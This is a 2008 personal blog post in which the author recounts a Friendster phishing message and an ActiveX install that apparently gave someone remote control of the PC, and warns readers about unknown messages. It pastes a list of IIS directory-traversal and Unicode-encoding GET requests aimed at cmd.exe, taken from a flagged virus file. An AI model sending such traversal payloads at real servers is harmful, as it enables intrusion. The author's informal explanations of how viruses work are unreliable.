Time Zone: GMT +08:00 Kuala Lumpur, Malaysia


17.12.08

system32 & almost hacked

This few days, i keep study bout pc.
its all about system32(C:/WINDOWS/system32)
Actually, once your pc is infected by virus,
the 1st thg the virus will do is attack your system32!

On the begining, i smell sumthg fishy in my pc.

I was checking my friendster. i check my inbox. There's sum1 send me a mail.
It was titled L O L. it is about spycams tat caught ur face sumwhere.
I clicked it and enjoy the video, but its ntg.
Anyway, the site requires to install sum kind of ActiveX controller tat i nvr heard b4.
I've install it, then, suddenly i feel my mouse been controlled.
Omg! shit!

There is no choice left. I backed up my files inside tat pc.
Then, i juz let the damn mouse move it self.
I think they using sum kinda programs tat can control frm far.
and the wierd thg is, the mouse help me to forward the frenster msg tat i recieve tat time!

I cant stand it anymore, i shut down my pc.
then, i restart my pc again. The pc is alright.
then i use my antivirus to scan my pc.
guess wat, 150 harmfull threat! lol (i think there are sum old 1)

i open 1 of the virus file, and it shows me this. (dun try to open if u guys dunno!)
GET /scripts/root.exe?/c+dirGET /MSADC/root.exe?/c+dirGET /c/winnt/system32/cmd.exe?/c+dirGET /d/winnt/system32/cmd.exe?/c+dirGET /scripts/..%5c../winnt/system32/cmd.exe?/c+dirGET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dirGET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dirGET/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dirGET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dirGET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dirGET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dirGET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dirGET /scripts/..%35c../winnt/system32/cmd.exe?/c+dirGET /scripts/..%35c../winnt/system32/cmd.exe?/c+dirGET /scripts/..%5c../winnt/system32/cmd.exe?/c+dirGET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

Maybe sum of u dun understand. I dunno hw to explain. :P


Izzit sum1 trying to hack me? I bet the person sure want sumthg more than this. so guys, pls beware by opening the msg tat u recieve frm email's or frenster or watever tat u dunno!

No comments: